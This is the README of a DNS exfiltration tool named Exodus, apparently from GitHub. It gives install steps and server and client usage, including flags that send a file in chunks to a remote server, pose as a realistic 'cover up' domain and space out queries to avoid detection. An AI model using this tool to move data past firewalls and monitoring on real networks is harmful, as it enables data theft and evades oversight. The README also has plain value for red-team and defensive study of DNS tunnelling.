DNS Exfiltration tool. By setting up a remote server listening for "DNS queries", we can bypass most firewall rules and monitoring.
This does not guarantee perfect stealth! A good network admin and setup will easily spot such traffic and flag it.
Do not use for malicious or illegal purposes! Use at your own risk.
- Download the source code
git clone https://github.com/cpl/exodus.git
- Run the following:
make
, this will test everything, get dependencies and build the executables - Inside the folder
./out/
, you will see the server and client executables
May not contain latest changes (some of which are bug fixes)!
- Go to Exodus Releases on GitHub
- Download the binaries for your systems
go get cpl.li/go/exodus/cmd/exodus-client
go get cpl.li/go/exodus/cmd/exodus-server
You can simply run it after installing it: exodus-server
This will run with the default port 53
and default data directory (tmp).
You can set --port 1453
to something custom and --data /var/exodus
to whatever you want. There is also a -v
flag to display logging messages.
When the server will receive a "query" it will store it in the following structure:
DATADIR/{token}/{count}.out
For example sending a file in 4 chunks using the token example and the server configured with the default temp dir, will result in the following:
/tmp/exodus/example/00000000.out
/tmp/exodus/example/00000001.out
/tmp/exodus/example/00000002.out
/tmp/exodus/example/00000003.out
From here you could do something as simple as: cat * > full.out
to assemble it back.
The server can also run in Docker. To do so, first build the Docker image docker build -t exodus .
and then start it with docker run -p <YOUR DNS UDP PORT>:5353/udp -it exodus
.
Another way is to pull it as docker pull docker.pkg.github.com/cpl/exodus/exodus-server
from the GitHub package manager.
The Exodus client needs the following flags:
--server dns.example.com
, this will be the address where YOU installed the Exodus Server--target normaldomain.com
, this domain will be the "cover up", so set it to something realistic
Other optional flags are:
--file something.txt
, by default Exodus Client will use stdin as the input source--size 16
, this is how many bytes to send per DNS query, the default is the max--port 1453
, if you set the server to use something other than 53--token example
, use different tokens for different "uploads", this will separate them server side-v
, enables verbose logging--timed 30
, will send 1 chunk every 30 seconds